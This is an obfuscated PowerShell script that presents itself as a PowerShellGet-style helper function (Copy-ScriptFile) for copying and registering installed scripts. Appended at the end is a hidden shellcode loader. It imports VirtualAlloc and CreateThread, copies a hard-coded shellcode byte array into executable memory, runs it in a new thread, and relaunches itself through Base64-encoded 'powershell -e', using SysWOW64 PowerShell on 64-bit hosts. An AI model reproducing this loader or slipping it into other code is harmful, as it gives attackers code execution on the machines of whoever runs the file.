 &("{2}{1}{0}" -f'ItEM','t-','Se') VaRiAbLe:o2yiWZ ( [tyPe]("{2}{5}{4}{7}{3}{6}{1}{0}"-F'ER','iZ','sY','t','ENT.au','STeM.maNAgem','IoN.pSseRiaL','TOmA'))  ;  &("{0}{1}{2}"-f'sET','-ItE','m')  ('V'+'A'+'riABLe:6'+'MPQb7')  ([TypE]("{0}{2}{3}{1}" -f 'sy','ERT','S','tEM.CONv') ) ;  .("{1}{0}"-f'T','sE')  ("8qs"+"fXg")  ([TYpE]("{3}{4}{0}{2}{1}" -f'n','OdInG','c','sYstE','M.TExT.E'))  ;  &("{0}{3}{1}{2}"-f 'SEt-v','IA','BlE','ar') ('OG'+'YI6'+'9') ([tYpe]("{1}{0}"-f'tr','INtP'))  ; function CoPy`-`scRiPt`File
{
    [CmdletBinding(pOsItiOnALbINdiNg=${fa`lSe})]
    Param
    (
        [Parameter(mANdAtORY=${TR`UE})]
        [ValidateNotNullOrEmpty()]
        [string]
        ${sOU`RcEPA`TH},

        [Parameter(manDatorY=${t`RuE})]
        [ValidateNotNullOrEmpty()]
        [string]
        ${d`esT`InA`TiOnPatH},

        [Parameter(maNdatorY=${Tr`UE})]
        [ValidateNotNull()]
        [PSCustomObject]
        ${P`Sge`Tit`eminfo},

        [Parameter()]
        [string]
        ${sCo`Pe}
    )

    ${Ev} = ${N`UlL}
    ${ME`SS`AGe} = ${lOc`AlIZE`DData}."adMInI`S`T`RaTOrr`Ig`htSNeeD`edORspe`CIFY`cURr`E`NTuSer`SCo`Pe"

    
    if(-not (.(("{3}{5}{8}{1}{4}{12}{11}{2}{0}{10}{7}{6}{9}"-f 'e','ft','ag','M','.PowerS','icros','9cTest-Pat','entL','o','h','m','an','hell.M')).RePlace('L9c','\') -Path ${d`ESTI`Na`TIonpaTh}))
    {
        ${N`UlL} = .((("{3}{1}{0}{4}{7}{2}{6}{5}" -f 'osoft.Powe','cr','l.Management','Mi','rShe','m','{0}New-Ite','l'))-f  [CHar]92) -Path ${dEST`I`N`ATi`onPatH} `
                                                         -ItemType ("{0}{1}{2}"-f 'Dir','e','ctory') `
                                                         -Force `
                                                         -ErrorVariable ('ev') `
                                                         -ErrorAction ("{1}{4}{3}{0}{2}"-f 'n','Sil','ue','i','entlyCont') `
                                                         -WarningAction ("{1}{0}{3}{2}" -f 'ilentlyContin','S','e','u') `
                                                         -Confirm:${Fa`lSE} `
                                                         -WhatIf:${F`ALsE}

        if(${e`V})
        {
            ${sCr`IPt:iS`R`UNnING`As`eLEVATEd} = ${fa`L`Se}
            .("{0}{2}{1}"-f'Th','wError','ro') -ExceptionName ("{3}{2}{4}{0}{1}"-f'Excep','tion','stem','Sy','.Argument') `
                       -ExceptionMessage ${MESs`AgE} `
                       -ErrorId ("{6}{8}{5}{0}{2}{9}{1}{3}{7}{4}"-f'igh','ify','tsNeeded','Cur','erScope','atorR','Adm','rentUs','inistr','OrSpec') `
                       -CallerPSCmdlet ${p`sCmD`Let} `
                       -ErrorCategory ("{4}{2}{3}{1}{0}" -f 't','dArgumen','nva','li','I') `
                       -ExceptionObject ${Ev}
        }
    }

    &((("{4}{2}{3}{0}{1}{6}{5}"-f 'l.Manageme','nt9BcCo','Po','werShel','Microsoft.','Item','py-'))  -cRepLaCe  '9Bc',[ChAR]92) -Path ${So`URcEpa`Th} `
                                              -Destination ${DEStiNaT`iON`P`Ath} `
                                              -Force `
                                              -Confirm:${f`A`lSE} `
                                              -WhatIf:${F`AL`SE} `
                                              -ErrorVariable ('ev') `
                                              -ErrorAction ("{4}{3}{0}{1}{2}"-f'ont','in','ue','tlyC','Silen')

    if(${E`V})
    {
        ${SCRI`pt:ISrUnn`i`NGasE`lEvAT`ED} = ${f`ALSE}
        .("{2}{1}{0}{3}"-f 'ro','wEr','Thro','r') -ExceptionName ("{4}{5}{1}{7}{6}{3}{0}{2}" -f 'i','rgumentE','on','t','Sy','stem.A','ep','xc') `
                   -ExceptionMessage ${Me`sSa`gE} `
                   -ErrorId ("{5}{3}{8}{0}{6}{4}{1}{7}{2}"-f 'Rig','u','serScope','istra','edOrSpecifyC','Admin','htsNeed','rrentU','tor') `
                   -CallerPSCmdlet ${Ps`cm`DLet} `
                   -ErrorCategory ("{0}{4}{1}{3}{2}"-f'I','l','nt','idArgume','nva') `
                   -ExceptionObject ${Ev}
    }

    if(${S`co`pE})
    {
        
        ${iN`stAL`lE`DSc`R`Ipt`InFO`FilENAME} = "$($PSGetItemInfo.Name)_$script:InstalledScriptInfoFileName"

        if(${SCo`pe} -eq ("{1}{0}{2}" -f 'llU','A','sers'))
        {
            ${SCRi`pTi`NfOP`ATh} = &((("{1}{8}{9}{2}{4}{7}{6}{10}{5}{3}{0}"-f'ath','M','rosoft.','}Join-P','P','nagement{0','ll.M','owerShe','i','c','a'))-f [ChAR]92) -Path ${sc`R`IP`T:PROGRAMf`Ile`sInsTAlle`d`Scr`I`PT`I`N`F`osPATH} `
                                                                        -ChildPath ${Insta`LLed`s`C`RI`Pt`iNFof`ilEna`Me}
        }
        else
        {
            ${scRI`p`Tin`FOPath} = &((("{6}{1}{8}{0}{3}{7}{5}{2}{4}{9}{10}"-f 'owerShe','s','anag','ll','ement{0','M','Micro','.','oft.P','}','Join-Path'))  -f  [cHAR]92) -Path ${S`c`Rip`T:m`YdOcuMENTsi`Ns`TaLl`EDsCR`ipTINfOsP`ATH} `
                                                                        -ChildPath ${i`NSTallEdSCRip`T`I`N`Fo`F`ILeN`AMe}
        }

        &((("{6}{5}{3}{1}{4}{0}{2}{7}"-f't','erSh','ility','oft.Pow','ell.U','os','Micr','dHNOut-File')) -REpLAce'dHN',[CHAr]92) -FilePath ${SCrip`TiN`FOPaTh} `
                                              -Force `
                                              -InputObject (  ${O2`YIWZ}::("{1}{0}"-f'ize','Serial').Invoke(${p`SG`eTi`TeMinfO}))
    }
}
${M`KM} = '$51ft = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $51ft -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xea,0xd9,0x74,0x24,0xf4,0xbf,0x33,0x8d,0xfc,0xec,0x5a,0x33,0xc9,0xb1,0x47,0x31,0x7a,0x18,0x83,0xc2,0x04,0x03,0x7a,0x27,0x6f,0x09,0x10,0xaf,0xed,0xf2,0xe9,0x2f,0x92,0x7b,0x0c,0x1e,0x92,0x18,0x44,0x30,0x22,0x6a,0x08,0xbc,0xc9,0x3e,0xb9,0x37,0xbf,0x96,0xce,0xf0,0x0a,0xc1,0xe1,0x01,0x26,0x31,0x63,0x81,0x35,0x66,0x43,0xb8,0xf5,0x7b,0x82,0xfd,0xe8,0x76,0xd6,0x56,0x66,0x24,0xc7,0xd3,0x32,0xf5,0x6c,0xaf,0xd3,0x7d,0x90,0x67,0xd5,0xac,0x07,0xfc,0x8c,0x6e,0xa9,0xd1,0xa4,0x26,0xb1,0x36,0x80,0xf1,0x4a,0x8c,0x7e,0x00,0x9b,0xdd,0x7f,0xaf,0xe2,0xd2,0x8d,0xb1,0x23,0xd4,0x6d,0xc4,0x5d,0x27,0x13,0xdf,0x99,0x5a,0xcf,0x6a,0x3a,0xfc,0x84,0xcd,0xe6,0xfd,0x49,0x8b,0x6d,0xf1,0x26,0xdf,0x2a,0x15,0xb8,0x0c,0x41,0x21,0x31,0xb3,0x86,0xa0,0x01,0x90,0x02,0xe9,0xd2,0xb9,0x13,0x57,0xb4,0xc6,0x44,0x38,0x69,0x63,0x0e,0xd4,0x7e,0x1e,0x4d,0xb0,0xb3,0x13,0x6e,0x40,0xdc,0x24,0x1d,0x72,0x43,0x9f,0x89,0x3e,0x0c,0x39,0x4d,0x41,0x27,0xfd,0xc1,0xbc,0xc8,0xfe,0xc8,0x7a,0x9c,0xae,0x62,0xab,0x9d,0x24,0x73,0x54,0x48,0xd0,0x76,0xc2,0xb3,0x8d,0x78,0x68,0x5c,0xcc,0x7a,0x8d,0x27,0x59,0x9c,0xdd,0x07,0x0a,0x31,0x9d,0xf7,0xea,0xe1,0x75,0x12,0xe5,0xde,0x65,0x1d,0x2f,0x77,0x0f,0xf2,0x86,0x2f,0xa7,0x6b,0x83,0xa4,0x56,0x73,0x19,0xc1,0x58,0xff,0xae,0x35,0x16,0x08,0xda,0x25,0xce,0xf8,0x91,0x14,0x58,0x06,0x0c,0x32,0x64,0x92,0xab,0x95,0x33,0x0a,0xb6,0xc0,0x73,0x95,0x49,0x27,0x08,0x1c,0xdc,0x88,0x66,0x61,0x30,0x09,0x76,0x37,0x5a,0x09,0x1e,0xef,0x3e,0x5a,0x3b,0xf0,0xea,0xce,0x90,0x65,0x15,0xa7,0x45,0x2d,0x7d,0x45,0xb0,0x19,0x22,0xb6,0x97,0x9b,0x1e,0x61,0xd1,0xe9,0x4e,0xb1;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$f9Af=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($f9Af.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$f9Af,0,0,0);for (;;){Start-sleep 60};';${e} =   (  &("{1}{0}"-f 'Tem','I') ('v'+'A'+'rIAbLe:6'+'Mpqb7') )."v`ALue"::"T`ob`Ase64`StRinG"(  ${8`Q`SFxG}::"u`NicO`dE".("{2}{0}{1}"-f'y','tes','GetB').Invoke(${m`kM}));${0`jW} = "-e ";if( ${o`gY`I69}::"s`Ize" -eq 8){${y`WM} = ${en`V`:Sys`TEmR`Oot} + ((("{9}{12}{4}{2}{8}{5}{1}{6}{3}{7}{10}{13}{11}{0}{14}"-f 'owe','rSh','64{0}WindowsP','l','swow','we','el','{0}v','o','{0}s','1.0','0}p','y','{','rshell'))  -F [ChaR]92);&("{1}{0}" -f'ex','i') ('& '+"$YwM "+"$0JW "+"$e")}else{;&("{1}{0}"-f 'x','ie') ('& '+'power'+'she'+'ll'+' '+"$0JW "+"$e");}
